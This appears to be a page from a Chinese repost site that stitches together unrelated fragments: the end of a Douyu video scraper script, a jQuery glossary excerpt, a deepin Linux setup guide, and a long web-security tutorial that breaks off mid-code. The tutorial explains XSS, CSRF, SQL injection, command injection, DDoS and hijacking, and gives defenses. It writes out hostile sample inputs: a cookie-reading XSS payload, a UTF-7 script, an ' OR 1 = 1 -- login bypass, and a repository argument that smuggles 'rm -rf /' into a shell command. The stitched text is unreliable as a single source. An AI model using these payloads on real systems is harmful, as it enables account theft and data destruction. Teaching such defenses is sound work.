'https://v.douyu.com/video/author/getAuthorVideoListByNew?up_id={0}&cate2_id=0&limit=30&page={1}'.format(config['UID'],page)get_list_html = get_content_requests(listurl)if get_list_html:list_json = get_list(get_list_html.text,1)if list_json:list_get_kong(list_json)else:print('~~~~~按列表ID采集~~~~~')listurl = 'https://v.douyu.com/video/video/listData?page={1}&cate2Id={0}&action=new'.format(config['CID'],page)get_list_html = get_content_requests(listurl)if get_list_html:list_json = get_list(get_list_html.text,2)if list_json:list_get_kong(list_json)初始化if __name__=='__main__':if config['POOL']:groups = [x for x in range(config['PAGE_START'],config['PAGE_END']+1)]pool = Pool()pool.map(main, groups)else:for item in range(config['PAGE_START'],config['PAGE_END']+1):main(item)print('~~~~~已经完成【所有操作】~~~~~') 总结：众所周知，BiliBili是一个学习的网站！ 本篇文章为转载内容。原文链接：https://blog.csdn.net/qq_35875470/article/details/89857445。 该文由互联网用户投稿提供，文中观点代表作者本人意见，并不代表本站的立场。 作为信息平台，本站仅提供文章转载服务，并不拥有其所有权，也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况，请及时联系我们，我们将第一时间进行核实并删除相应内容。

...、主机名、端口号以及路径和查询字符串。 jQuery $.get() 方法 , jQuery库提供的一个简化 AJAX GET 请求的方法。$.get()允许开发者通过HTTP GET方式从服务器异步请求数据，并提供一个回调函数来处理服务器返回的数据。然而，在文章的上下文中，虽然示例使用了$.get()方法，但其实该方法并不适用于获取当前页面URL，因为这个信息可以直接通过window.location.href获取，无需发起HTTP请求。 Single Page Application (SPA) , 单页应用程序是一种Web应用模型，用户在浏览过程中只需加载一次网页（初始页面），后续的操作和内容更新都在同一页面内完成，而不会触发完整的页面刷新。History API中的history.pushState()等方法对于SPA应用尤其重要，因为它使得开发者能够动态改变浏览器地址栏中的URL，同时保持页面状态的连续性和导航历史记录的完整性，从而模拟多页面应用的用户体验。

...户密码 8. 安装PostgreSQL 安装PostgreSQL sudo apt-get install -y postgresql-11 修改postgres用户密码 sudo -u postgres psql 进入后执行SQL ALTER USER postgres WITH PASSWORD 'postgres'; 退出 exit; 9. 安装Redis sudo apt-get install -y redis-server 修改配置文件 sudo vim /etc/redis/redis.conf 重启 sudo systemctl restart redis sudo systemctl enable redis-server 10. 安装Nginx sudo apt-get install -y nginx 修改配置文件 sudo vim /etc/nginx/nginx.conf 重启 sudo systemctl restart nginx sudo systemctl enable nginx 11. 安装VMWare Workstation 下载 https://www.vmware.com/go/getworkstation-linux 放到文件夹，进入，执行 sudo chmod +x VMware-Workstation-Full-17.0.0-20800274.x86_64.bundle sudo ./VMware-Workstation-Full-17.0.0-20800274.x86_64.bundle 安装gcc sudo apt-get install -y gcc 进入控制台，找到VMWare，开始安装，安装过程同Windows 如果如果遇到build environment error错误，执行下列命令后再重新在控制台打开图标 sudo apt-get install -y libcanberra 如果还不行，执行 sudo vmware-modconfig --console --install-all 看看还缺什么 12. 安装百度网盘 官网下载Linux版本的软件：百度网盘 客户端下载 deepin的软件包格式为deb。安装： sudo dpkg -i baidunetdisk_3.5.0_amd64.deb 最新版本 sudo dpkg -i baidunetdisk_4.17.7_amd64.deb 如果报错，执行 sudo apt-get -f install 13. 安装WPS 官网下载Linux版本的软件：WPS Office 2019 for Linux-支持多版本下载_WPS官方网站 deepin的软件包格式为deb。安装： sudo dpkg -i wps-office_11.1.0.10702_amd64.deb 最新版本 sudo dpkg -i wps-office_11.1.0.11691_amd64.deb 如果报错执行 sudo apt-get -f install wps有可能会报缺字体,缺的字体如下,双击安装 百度网盘 请输入提取码 提取码:lexo 14. 安装VS Code 官网下载Linux版本的软件：Visual Studio Code - Code Editing. Redefined deepin的软件包格式为deb。安装： sudo dpkg -i code_1.61.1-1634175470_amd64.deb 最新版本 sudo dpkg -i code_1.76.0-1677667493_amd64.deb 如果报错执行 sudo apt-get -f install 15. 安装微信、QQ、迅雷 微信 sudo apt-get install -y com.qq.weixin.deepin QQ sudo apt-get install -y com.qq.im.deepin 迅雷 sudo apt-get install -y com.xunlei.download 16. 安装视频播放器 sudo apt-get -y install smplayer sudo apt-get -y install vlc 17. 安装SSH工具electerm 下载electerm的deb版本 deepin的软件包格式为deb。安装： https://github.com/electerm/electerm/releases/download/v1.25.16/electerm-1.25.16-linux-amd64.deb sudo dpkg -i electerm-1.25.16-linux-amd64.deb 18.安装FTP/SFTP工具FileZilla sudo apt-get -y install filezilla 19. 安装edge浏览器 下载edge浏览器 deepin的软件包格式为deb。安装： 下载 Microsoft Edge sudo apt-get -y install fonts-liberation sudo apt-get -y install libu2f-udev sudo dpkg -i microsoft-edge-beta_95.0.1020.30-1_amd64.deb 最新版本 sudo dpkg -i microsoft-edge-stable_110.0.1587.63-1_amd64.deb 本篇文章为转载内容。原文链接：https://blog.csdn.net/weixin_42173947/article/details/119973703。 该文由互联网用户投稿提供，文中观点代表作者本人意见，并不代表本站的立场。 作为信息平台，本站仅提供文章转载服务，并不拥有其所有权，也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况，请及时联系我们，我们将第一时间进行核实并删除相应内容。

...漏洞，XSS (Cross Site Script)，跨站脚本攻击，因为缩写和 CSS (Cascading Style Sheets) 重叠，所以只能叫 XSS。 XSS 的原理是恶意攻击者往 Web 页面里插入恶意可执行网页脚本代码，当用户浏览该页之时，嵌入其中 Web 里面的脚本代码会被执行，从而可以达到攻击者盗取用户信息或其他侵犯用户安全隐私的目的。XSS 的攻击方式千变万化，但还是可以大致细分为几种类型。 非持久型 XSS 非持久型 XSS 漏洞，也叫反射型 XSS 漏洞，一般是通过给别人发送带有恶意脚本代码参数的 URL，当 URL 地址被打开时，特有的恶意代码参数被 HTML 解析、执行。 非持久型 XSS 举一个例子，比如你的 Web 页面中包含有以下代码： Select your language:<select><script>document.write(''+ '<option value=1>'+ location.href.substring(location.href.indexOf('default=') + 8)+ '</option>');document.write('<option value=2>English</option>');</script></select> 攻击者可以直接通过 URL 类似：https://xx.com/xx?default=<script>alert(document.cookie)</script>) 注入可执行的脚本代码。 非持久型 XSS 漏洞攻击有以下几点特征： 即时性，不经过服务器存储，直接通过 HTTP 的 GET 和 POST 请求就能完成一次攻击，拿到用户隐私数据。 攻击者需要诱骗点击 反馈率低，所以较难发现和响应修复 盗取用户敏感保密信息 为了防止出现非持久型 XSS 漏洞，需要确保这么几件事情： Web 页面渲染的所有内容或者渲染的数据都必须来自于服务端。 尽量不要从 URL，document.referrer，document.forms 等这种 DOM API 中获取数据直接渲染。 尽量不要使用 eval, new Function()，document.write()，document.writeln()，window.setInterval()，window.setTimeout()，innerHTML，document.creteElement() 等可执行字符串的方法。 如果做不到以上几点，也必须对涉及 DOM 渲染的方法传入的字符串参数做 escape 转义。 前端渲染的时候对任何的字段都需要做 escape 转义编码。 escape 转义的目的是将一些构成 HTML 标签的元素转义，比如 <，>，空格 等，转义成 <，>， 等显示转义字符。有很多开源的工具可以协助我们做 escape 转义。 持久型 XSS 持久型 XSS 漏洞，也被称为存储型 XSS 漏洞，一般存在于 Form 表单提交等交互功能，如发帖留言，提交文本信息等，黑客利用的 XSS 漏洞，将内容经正常功能提交进入数据库持久保存，当前端页面获得后端从数据库中读出的注入代码时，恰好将其渲染执行。 主要注入页面方式和非持久型 XSS 漏洞类似，只不过持久型的不是来源于 URL，refferer，forms 等，而是来源于后端从数据库中读出来的数据。持久型 XSS 攻击不需要诱骗点击，黑客只需要在提交表单的地方完成注入即可，但是这种 XSS 攻击的成本相对还是很高。攻击成功需要同时满足以下几个条件： POST 请求提交表单后端没做转义直接入库。 后端从数据库中取出数据没做转义直接输出给前端。 前端拿到后端数据没做转义直接渲染成 DOM。 持久型 XSS 有以下几个特点： 持久性，植入在数据库中 危害面广，甚至可以让用户机器变成 DDoS 攻击的肉鸡。 盗取用户敏感私密信息 为了防止持久型 XSS 漏洞，需要前后端共同努力： 后端在入库前应该选择不相信任何前端数据，将所有的字段统一进行转义处理。 后端在输出给前端数据统一进行转义处理。 前端在渲染页面 DOM 的时候应该选择不相信任何后端数据，任何字段都需要做转义处理。 基于字符集的 XSS 其实现在很多的浏览器以及各种开源的库都专门针对了 XSS 进行转义处理，尽量默认抵御绝大多数 XSS 攻击，但是还是有很多方式可以绕过转义规则，让人防不胜防。比如「基于字符集的 XSS 攻击」就是绕过这些转义处理的一种攻击方式，比如有些 Web 页面字符集不固定，用户输入非期望字符集的字符，有时会绕过转义过滤规则。 以基于 utf-7 的 XSS 为例 utf-7 是可以将所有的 unicode 通过 7bit 来表示的一种字符集 (但现在已经从 Unicode 规格中移除)。 这个字符集为了通过 7bit 来表示所有的文字, 除去数字和一部分的符号,其它的部分将都以 base64 编码为基础的方式呈现。 <script>alert("xss")</script>可以被解释为：+ADw-script+AD4-alert(+ACI-xss+ACI-)+ADw-/script+AD4- 可以形成「基于字符集的 XSS 攻击」的原因是由于浏览器在 meta 没有指定 charset 的时候有自动识别编码的机制，所以这类攻击通常就是发生在没有指定或者没来得及指定 meta 标签的 charset 的情况下。 所以我们有什么办法避免这种 XSS 呢？ 记住指定 XML 中不仅要指定字符集为 utf-8，而且标签要闭合 牛文推荐：http://drops.wooyun.org/papers/1327 （这个讲的很详细） 基于 Flash 的跨站 XSS 基于 Flash 的跨站 XSS 也是属于反射型 XSS 的一种，虽然现在开发 ActionScript 的产品线几乎没有了，但还是提一句吧，AS 脚本可以接受用户输入并操作 cookie，攻击者可以配合其他 XSS（持久型或者非持久型）方法将恶意 swf 文件嵌入页面中。主要是因为 AS 有时候需要和 JS 传参交互，攻击者会通过恶意的 XSS 注入篡改参数，窃取并操作cookie。 避免方法： 严格管理 cookie 的读写权限 对 Flash 能接受用户输入的参数进行过滤 escape 转义处理 未经验证的跳转 XSS 有一些场景是后端需要对一个传进来的待跳转的 URL 参数进行一个 302 跳转，可能其中会带有一些用户的敏感（cookie）信息。如果服务器端做302 跳转，跳转的地址来自用户的输入，攻击者可以输入一个恶意的跳转地址来执行脚本。 这时候需要通过以下方式来防止这类漏洞： 对待跳转的 URL 参数做白名单或者某种规则过滤 后端注意对敏感信息的保护, 比如 cookie 使用来源验证。 CSRF CSRF（Cross-Site Request Forgery），中文名称：跨站请求伪造攻击 那么 CSRF 到底能够干嘛呢？你可以这样简单的理解：攻击者可以盗用你的登陆信息，以你的身份模拟发送各种请求。攻击者只要借助少许的社会工程学的诡计，例如通过 QQ 等聊天软件发送的链接(有些还伪装成短域名，用户无法分辨)，攻击者就能迫使 Web 应用的用户去执行攻击者预设的操作。例如，当用户登录网络银行去查看其存款余额，在他没有退出时，就点击了一个 QQ 好友发来的链接，那么该用户银行帐户中的资金就有可能被转移到攻击者指定的帐户中。 所以遇到 CSRF 攻击时，将对终端用户的数据和操作指令构成严重的威胁。当受攻击的终端用户具有管理员帐户的时候，CSRF 攻击将危及整个 Web 应用程序。 CSRF 原理 下图大概描述了 CSRF 攻击的原理，可以理解为有一个小偷在你配钥匙的地方得到了你家的钥匙，然后拿着要是去你家想偷什么偷什么。 csrf原理 完成 CSRF 攻击必须要有三个条件： 用户已经登录了站点 A，并在本地记录了 cookie 在用户没有登出站点 A 的情况下（也就是 cookie 生效的情况下），访问了恶意攻击者提供的引诱危险站点 B (B 站点要求访问站点A)。 站点 A 没有做任何 CSRF 防御 你也许会问：「如果我不满足以上三个条件中的任意一个，就不会受到 CSRF 的攻击」。其实可以这么说的，但你不能保证以下情况不会发生： 你不能保证你登录了一个网站后，不再打开一个 tab 页面并访问另外的网站，特别现在浏览器都是支持多 tab 的。 你不能保证你关闭浏览器了后，你本地的 cookie 立刻过期，你上次的会话已经结束。 上图中所谓的攻击网站 B，可能是一个存在其他漏洞的可信任的经常被人访问的网站。 预防 CSRF CSRF 的防御可以从服务端和客户端两方面着手，防御效果是从服务端着手效果比较好，现在一般的 CSRF 防御也都在服务端进行。服务端的预防 CSRF 攻击的方式方法有多种，但思路上都是差不多的，主要从以下两个方面入手： 正确使用 GET，POST 请求和 cookie 在非 GET 请求中增加 token 一般而言，普通的 Web 应用都是以 GET、POST 请求为主，还有一种请求是 cookie 方式。我们一般都是按照如下规则设计应用的请求： GET 请求常用在查看，列举，展示等不需要改变资源属性的时候（数据库 query 查询的时候） POST 请求常用在 From 表单提交，改变一个资源的属性或者做其他一些事情的时候（数据库有 insert、update、delete 的时候） 当正确的使用了 GET 和 POST 请求之后，剩下的就是在非 GET 方式的请求中增加随机数，这个大概有三种方式来进行： 为每个用户生成一个唯一的 cookie token，所有表单都包含同一个伪随机值，这种方案最简单，因为攻击者不能获得第三方的 cookie(理论上)，所以表单中的数据也就构造失败，但是由于用户的 cookie 很容易由于网站的 XSS 漏洞而被盗取，所以这个方案必须要在没有 XSS 的情况下才安全。 每个 POST 请求使用验证码，这个方案算是比较完美的，但是需要用户多次输入验证码，用户体验比较差，所以不适合在业务中大量运用。 渲染表单的时候，为每一个表单包含一个 csrfToken，提交表单的时候，带上 csrfToken，然后在后端做 csrfToken 验证。 CSRF 的防御可以根据应用场景的不同自行选择。CSRF 的防御工作确实会在正常业务逻辑的基础上带来很多额外的开发量，但是这种工作量是值得的，毕竟用户隐私以及财产安全是产品最基础的根本。 SQL 注入 SQL 注入漏洞（SQL Injection）是 Web 开发中最常见的一种安全漏洞。可以用它来从数据库获取敏感信息，或者利用数据库的特性执行添加用户，导出文件等一系列恶意操作，甚至有可能获取数据库乃至系统用户最高权限。 而造成 SQL 注入的原因是因为程序没有有效的转义过滤用户的输入，使攻击者成功的向服务器提交恶意的 SQL 查询代码，程序在接收后错误的将攻击者的输入作为查询语句的一部分执行，导致原始的查询逻辑被改变，额外的执行了攻击者精心构造的恶意代码。 很多 Web 开发者没有意识到 SQL 查询是可以被篡改的，从而把 SQL 查询当作可信任的命令。殊不知，SQL 查询是可以绕开访问控制，从而绕过身份验证和权限检查的。更有甚者，有可能通过 SQL 查询去运行主机系统级的命令。 SQL 注入原理 下面将通过一些真实的例子来详细讲解 SQL 注入的方式的原理。 考虑以下简单的管理员登录表单： <form action="/login" method="POST"><p>Username: <input type="text" name="username" /></p><p>Password: <input type="password" name="password" /></p><p><input type="submit" value="登陆" /></p></form> 后端的 SQL 语句可能是如下这样的： let querySQL = SELECT FROM userWHERE username='${username}'AND psw='${password}'; // 接下来就是执行 sql 语句… 目的就是来验证用户名和密码是不是正确，按理说乍一看上面的 SQL 语句也没什么毛病，确实是能够达到我们的目的，可是你只是站在用户会老老实实按照你的设计来输入的角度来看问题，如果有一个恶意攻击者输入的用户名是 zoumiaojiang’ OR 1 = 1 --，密码随意输入，就可以直接登入系统了。WFT! 冷静下来思考一下，我们之前预想的真实 SQL 语句是: SELECT FROM user WHERE username='zoumiaojiang' AND psw='mypassword' 可以恶意攻击者的奇怪用户名将你的 SQL 语句变成了如下形式： SELECT FROM user WHERE username='zoumiaojiang' OR 1 = 1 --' AND psw='xxxx' 在 SQL 中，-- 是注释后面的内容的意思，所以查询语句就变成了： SELECT FROM user WHERE username='zoumiaojiang' OR 1 = 1 这条 SQL 语句的查询条件永远为真，所以意思就是恶意攻击者不用我的密码，就可以登录进我的账号，然后可以在里面为所欲为，然而这还只是最简单的注入，牛逼的 SQL 注入高手甚至可以通过 SQL 查询去运行主机系统级的命令，将你主机里的内容一览无余，这里我也没有这个能力讲解的太深入，毕竟不是专业研究这类攻击的，但是通过以上的例子，已经了解了 SQL 注入的原理，我们基本已经能找到防御 SQL 注入的方案了。 如何预防 SQL 注入 防止 SQL 注入主要是不能允许用户输入的内容影响正常的 SQL 语句的逻辑，当用户的输入的信息将要用来拼接 SQL 语句的话，我们应该永远选择不相信，任何内容都必须进行转义过滤，当然做到这个还是不够的，下面列出防御 SQL 注入的几点注意事项： 严格限制Web应用的数据库的操作权限，给此用户提供仅仅能够满足其工作的最低权限，从而最大限度的减少注入攻击对数据库的危害 后端代码检查输入的数据是否符合预期，严格限制变量的类型，例如使用正则表达式进行一些匹配处理。 对进入数据库的特殊字符（’，"，\，<，>，&，，; 等）进行转义处理，或编码转换。基本上所有的后端语言都有对字符串进行转义处理的方法，比如 lodash 的 lodash._escapehtmlchar 库。 所有的查询语句建议使用数据库提供的参数化查询接口，参数化的语句使用参数而不是将用户输入变量嵌入到 SQL 语句中，即不要直接拼接 SQL 语句。例如 Node.js 中的 mysqljs 库的 query 方法中的 ? 占位参数。 mysql.query(SELECT FROM user WHERE username = ? AND psw = ?, [username, psw]); 在应用发布之前建议使用专业的 SQL 注入检测工具进行检测，以及时修补被发现的 SQL 注入漏洞。网上有很多这方面的开源工具，例如 sqlmap、SQLninja 等。 避免网站打印出 SQL 错误信息，比如类型错误、字段不匹配等，把代码里的 SQL 语句暴露出来，以防止攻击者利用这些错误信息进行 SQL 注入。 不要过于细化返回的错误信息，如果目的是方便调试，就去使用后端日志，不要在接口上过多的暴露出错信息，毕竟真正的用户不关心太多的技术细节，只要话术合理就行。 碰到要操作的数据库的代码，一定要慎重，小心使得万年船，多找几个人多来几次 code review，将问题都暴露出来，而且要善于利用工具，操作数据库相关的代码属于机密，没事不要去各种论坛晒自家站点的 SQL 语句，万一被人盯上了呢？ 命令行注入 命令行注入漏洞，指的是攻击者能够通过 HTTP 请求直接侵入主机，执行攻击者预设的 shell 命令，听起来好像匪夷所思，这往往是 Web 开发者最容易忽视但是却是最危险的一个漏洞之一，看一个实例： 假如现在需要实现一个需求：用户提交一些内容到服务器，然后在服务器执行一些系统命令去产出一个结果返回给用户，接口的部分实现如下： // 以 Node.js 为例，假如在接口中需要从 github 下载用户指定的 repoconst exec = require('mz/child_process').exec;let params = {/ 用户输入的参数 /};exec(git clone ${params.repo} /some/path); 这段代码确实能够满足业务需求，正常的用户也确实能从指定的 git repo 上下载到想要的代码，可是和 SQL 注入一样，这段代码在恶意攻击者眼中，简直就是香饽饽。 如果 params.repo 传入的是 https://github.com/zoumiaojiang/zoumiaojiang.github.io.git 当然没问题了。 可是如果 params.repo 传入的是 https://github.com/xx/xx.git && rm -rf / && 恰好你的服务是用 root 权限起的就惨了。 具体恶意攻击者能用命令行注入干什么也像 SQL 注入一样，手法是千变万化的，比如「反弹 shell 注入」等，但原理都是一样的，我们绝对有能力防止命令行注入发生。防止命令行注入需要做到以下几件事情： 后端对前端提交内容需要完全选择不相信，并且对其进行规则限制（比如正则表达式）。 在调用系统命令前对所有传入参数进行命令行参数转义过滤。 不要直接拼接命令语句，借助一些工具做拼接、转义预处理，例如 Node.js 的 shell-escape npm 包。 还是前面的例子，我们可以做到如下： const exec = require('mz/child_process').exec;// 借助 shell-escape npm 包解决参数转义过滤问题const shellescape = require('shell-escape');let params = {/ 用户输入的参数 /};// 先过滤一下参数，让参数符合预期if (!/正确的表达式/.test(params.repo)) {return;}let cmd = shellescape(['git','clone',params.repo,'/some/path']);// cmd 的值: git clone 'https://github.com/xx/xx.git && rm -rf / &&' /some/path// 这样就不会被注入成功了。exec(cmd); DDoS 攻击 DDoS 又叫分布式拒绝服务，全称 Distributed Denial of Service，其原理就是利用大量的请求造成资源过载，导致服务不可用，这个攻击应该不能算是安全问题，这应该算是一个另类的存在，因为这种攻击根本就是耍流氓的存在，「伤敌一千，自损八百」的行为。出于保护 Web App 不受攻击的攻防角度，还是介绍一下 DDoS 攻击吧，毕竟也是挺常见的。 DDoS 攻击可以理解为：「你开了一家店，隔壁家点看不惯，就雇了一大堆黑社会人员进你店里干坐着，也不消费，其他客人也进不来，导致你营业惨淡」。为啥说 DDoS 是个「伤敌一千，自损八百」的行为呢？毕竟隔壁店还是花了不少钱雇黑社会但是啥也没得到不是？DDoS 攻击的目的基本上就以下几个： 深仇大恨，就是要干死你 敲诈你，不给钱就干你 忽悠你，不买我防火墙服务就会有“人”继续干你 也许你的站点遭受过 DDoS 攻击，具体什么原因怎么解读见仁见智。DDos 攻击从层次上可分为网络层攻击与应用层攻击，从攻击手法上可分为快型流量攻击与慢型流量攻击，但其原理都是造成资源过载，导致服务不可用。 网络层 DDoS 网络层 DDos 攻击包括 SYN Flood、ACK Flood、UDP Flood、ICMP Flood 等。 SYN Flood 攻击 SYN flood 攻击主要利用了 TCP 三次握手过程中的 Bug，我们都知道 TCP 三次握手过程是要建立连接的双方发送 SYN，SYN + ACK，ACK 数据包，而当攻击方随意构造源 IP 去发送 SYN 包时，服务器返回的 SYN + ACK 就不能得到应答（因为 IP 是随意构造的），此时服务器就会尝试重新发送，并且会有至少 30s 的等待时间，导致资源饱和服务不可用，此攻击属于慢型 DDoS 攻击。 ACK Flood 攻击 ACK Flood 攻击是在 TCP 连接建立之后，所有的数据传输 TCP 报文都是带有 ACK 标志位的，主机在接收到一个带有 ACK 标志位的数据包的时候，需要检查该数据包所表示的连接四元组是否存在，如果存在则检查该数据包所表示的状态是否合法，然后再向应用层传递该数据包。如果在检查中发现该数据包不合法，例如该数据包所指向的目的端口在本机并未开放，则主机操作系统协议栈会回应 RST 包告诉对方此端口不存在。 UDP Flood 攻击 UDP flood 攻击是由于 UDP 是一种无连接的协议，因此攻击者可以伪造大量的源 IP 地址去发送 UDP 包，此种攻击属于大流量攻击。正常应用情况下，UDP 包双向流量会基本相等，因此发起这种攻击的攻击者在消耗对方资源的时候也在消耗自己的资源。 ICMP Flood 攻击 ICMP Flood 攻击属于大流量攻击，其原理就是不断发送不正常的 ICMP 包（所谓不正常就是 ICMP 包内容很大），导致目标带宽被占用，但其本身资源也会被消耗。目前很多服务器都是禁 ping 的（在防火墙在可以屏蔽 ICMP 包），因此这种攻击方式已经落伍。 网络层 DDoS 防御 网络层的 DDoS 攻击究其本质其实是无法防御的，我们能做得就是不断优化服务本身部署的网络架构，以及提升网络带宽。当然，还是做好以下几件事也是有助于缓解网络层 DDoS 攻击的冲击： 网络架构上做好优化，采用负载均衡分流。 确保服务器的系统文件是最新的版本，并及时更新系统补丁。 添加抗 DDos 设备，进行流量清洗。 限制同时打开的 SYN 半连接数目，缩短 SYN 半连接的 Timeout 时间。 限制单 IP 请求频率。 防火墙等防护设置禁止 ICMP 包等。 严格限制对外开放的服务器的向外访问。 运行端口映射程序或端口扫描程序，要认真检查特权端口和非特权端口。 关闭不必要的服务。 认真检查网络设备和主机/服务器系统的日志。只要日志出现漏洞或是时间变更,那这台机器就可能遭到了攻击。 限制在防火墙外与网络文件共享。这样会给黑客截取系统文件的机会，主机的信息暴露给黑客，无疑是给了对方入侵的机会。 加钱堆机器。。 报警。。 应用层 DDoS 应用层 DDoS 攻击不是发生在网络层，是发生在 TCP 建立握手成功之后，应用程序处理请求的时候，现在很多常见的 DDoS 攻击都是应用层攻击。应用层攻击千变万化，目的就是在网络应用层耗尽你的带宽，下面列出集中典型的攻击类型。 CC 攻击 当时绿盟为了防御 DDoS 攻击研发了一款叫做 Collapasar 的产品，能够有效的防御 SYN Flood 攻击。黑客为了挑衅，研发了一款 Challenge Collapasar 攻击工具（简称 CC）。 CC 攻击的原理，就是针对消耗资源比较大的页面不断发起不正常的请求，导致资源耗尽。因此在发送 CC 攻击前，我们需要寻找加载比较慢，消耗资源比较多的网页，比如需要查询数据库的页面、读写硬盘文件的等。通过 CC 攻击，使用爬虫对某些加载需要消耗大量资源的页面发起 HTTP 请求。 DNS Flood DNS Flood 攻击采用的方法是向被攻击的服务器发送大量的域名解析请求，通常请求解析的域名是随机生成或者是网络世界上根本不存在的域名，被攻击的DNS 服务器在接收到域名解析请求的时候首先会在服务器上查找是否有对应的缓存，如果查找不到并且该域名无法直接由服务器解析的时候，DNS 服务器会向其上层 DNS 服务器递归查询域名信息。域名解析的过程给服务器带来了很大的负载，每秒钟域名解析请求超过一定的数量就会造成 DNS 服务器解析域名超时。 根据微软的统计数据，一台 DNS 服务器所能承受的动态域名查询的上限是每秒钟 9000 个请求。而我们知道，在一台 P3 的 PC 机上可以轻易地构造出每秒钟几万个域名解析请求，足以使一台硬件配置极高的 DNS 服务器瘫痪，由此可见 DNS 服务器的脆弱性。 HTTP 慢速连接攻击 针对 HTTP 协议，先建立起 HTTP 连接，设置一个较大的 Conetnt-Length，每次只发送很少的字节，让服务器一直以为 HTTP 头部没有传输完成，这样连接一多就很快会出现连接耗尽。 应用层 DDoS 防御 判断 User-Agent 字段（不可靠，因为可以随意构造） 针对 IP + cookie，限制访问频率（由于 cookie 可以更改，IP 可以使用代理，或者肉鸡，也不可靠) 关闭服务器最大连接数等，合理配置中间件，缓解 DDoS 攻击。 请求中添加验证码，比如请求中有数据库操作的时候。 编写代码时，尽量实现优化，并合理使用缓存技术，减少数据库的读取操作。 加钱堆机器。。 报警。。 应用层的防御有时比网络层的更难，因为导致应用层被 DDoS 攻击的因素非常多，有时往往是因为程序员的失误，导致某个页面加载需要消耗大量资源，有时是因为中间件配置不当等等。而应用层 DDoS 防御的核心就是区分人与机器（爬虫），因为大量的请求不可能是人为的，肯定是机器构造的。因此如果能有效的区分人与爬虫行为，则可以很好地防御此攻击。 其他 DDoS 攻击 发起 DDoS 也是需要大量的带宽资源的，但是互联网就像森林，林子大了什么鸟都有，DDoS 攻击者也能找到其他的方式发起廉价并且极具杀伤力的 DDoS 攻击。 利用 XSS 举个例子，如果 12306 页面有一个 XSS 持久型漏洞被恶意攻击者发现，只需在春节抢票期间在这个漏洞中执行脚本使得往某一个小站点随便发点什么请求，然后随着用户访问的增多，感染用户增多，被攻击的站点自然就会迅速瘫痪了。这种 DDoS 简直就是无本万利，不用惊讶，现在大站有 XSS 漏洞的不要太多。 来自 P2P 网络攻击 大家都知道，互联网上的 P2P 用户和流量都是一个极为庞大的数字。如果他们都去一个指定的地方下载数据，成千上万的真实 IP 地址连接过来，没有哪个设备能够支撑住。拿 BT 下载来说，伪造一些热门视频的种子，发布到搜索引擎，就足以骗到许多用户和流量了，但是这只是基础攻击。 高级的 P2P 攻击，是直接欺骗资源管理服务器。如迅雷客户端会把自己发现的资源上传到资源管理服务器，然后推送给其它需要下载相同资源的用户，这样，一个链接就发布出去。通过协议逆向，攻击者伪造出大批量的热门资源信息通过资源管理中心分发出去，瞬间就可以传遍整个 P2P 网络。更为恐怖的是，这种攻击是无法停止的，即使是攻击者自身也无法停止，攻击一直持续到 P2P 官方发现问题更新服务器且下载用户重启下载软件为止。 最后总结下，DDoS 不可能防的住，就好比你的店只能容纳 50 人，黑社会有 100 人，你就换一家大店，能容纳 500 人，然后黑社会又找来了 1000 人，这种堆人头的做法就是 DDoS 本质上的攻防之道，「道高一尺，魔高一丈，魔高一尺，道高一丈」，讲真，必要的时候就答应勒索你的人的条件吧，实在不行就报警吧。 流量劫持 流量劫持应该算是黑产行业的一大经济支柱了吧？简直是让人恶心到吐，不吐槽了，还是继续谈干货吧，流量劫持基本分两种：DNS 劫持 和 HTTP 劫持，目的都是一样的，就是当用户访问 zoumiaojiang.com 的时候，给你展示的并不是或者不完全是 zoumiaojiang.com 提供的 “内容”。 DNS 劫持 DNS 劫持，也叫做域名劫持，可以这么理解，「你打了一辆车想去商场吃饭，结果你打的车是小作坊派来的，直接给你拉到小作坊去了」，DNS 的作用是把网络地址域名对应到真实的计算机能够识别的 IP 地址，以便计算机能够进一步通信，传递网址和内容等。如果当用户通过某一个域名访问一个站点的时候，被篡改的 DNS 服务器返回的是一个恶意的钓鱼站点的 IP，用户就被劫持到了恶意钓鱼站点，然后继而会被钓鱼输入各种账号密码信息，泄漏隐私。 dns劫持 这类劫持，要不就是网络运营商搞的鬼，一般小的网络运营商与黑产勾结会劫持 DNS，要不就是电脑中毒，被恶意篡改了路由器的 DNS 配置，基本上做为开发者或站长却是很难察觉的，除非有用户反馈，现在升级版的 DNS 劫持还可以对特定用户、特定区域等使用了用户画像进行筛选用户劫持的办法，另外这类广告显示更加随机更小，一般站长除非用户投诉否则很难觉察到，就算觉察到了取证举报更难。无论如何，如果接到有 DNS 劫持的反馈，一定要做好以下几件事： 取证很重要，时间、地点、IP、拨号账户、截屏、URL 地址等一定要有。 可以跟劫持区域的电信运营商进行投诉反馈。 如果投诉反馈无效，直接去工信部投诉，一般来说会加白你的域名。 HTTP 劫持 HTTP 劫持您可以这么理解，「你打了一辆车想去商场吃饭，结果司机跟你一路给你递小作坊的广告」，HTTP 劫持主要是当用户访问某个站点的时候会经过运营商网络，而不法运营商和黑产勾结能够截获 HTTP 请求返回内容，并且能够篡改内容，然后再返回给用户，从而实现劫持页面，轻则插入小广告，重则直接篡改成钓鱼网站页面骗用户隐私。能够实施流量劫持的根本原因，是 HTTP 协议没有办法对通信对方的身份进行校验以及对数据完整性进行校验。如果能解决这个问题，则流量劫持将无法轻易发生。所以防止 HTTP 劫持的方法只有将内容加密，让劫持者无法破解篡改，这样就可以防止 HTTP 劫持了。 HTTPS 协议就是一种基于 SSL 协议的安全加密网络应用层协议，可以很好的防止 HTTP 劫持。这里有篇 文章 讲的不错。HTTPS 在这就不深讲了，后面有机会我会单独好好讲讲 HTTPS。如果不想站点被 HTTP 劫持，赶紧将你的站点全站改造成 HTTPS 吧。 服务器漏洞 服务器除了以上提到的那些大名鼎鼎的漏洞和臭名昭著的攻击以外，其实还有很多其他的漏洞，往往也很容易被忽视，在这个小节也稍微介绍几种。 越权操作漏洞 如果你的系统是有登录控制的，那就要格外小心了，因为很有可能你的系统越权操作漏洞，越权操作漏洞可以简单的总结为 「A 用户能看到或者操作 B 用户的隐私内容」，如果你的系统中还有权限控制就更加需要小心了。所以每一个请求都需要做 userid 的判断 以下是一段有漏洞的后端示意代码： // ctx 为请求的 context 上下文let msgId = ctx.params.msgId;mysql.query('SELECT FROM msg_table WHERE msg_id = ?',[msgId]); 以上代码是任何人都可以查询到任何用户的消息，只要有 msg_id 就可以，这就是比较典型的越权漏洞，需要如下这么改进一下： // ctx 为请求的 context 上下文let msgId = ctx.params.msgId;let userId = ctx.session.userId; // 从会话中取出当前登陆的 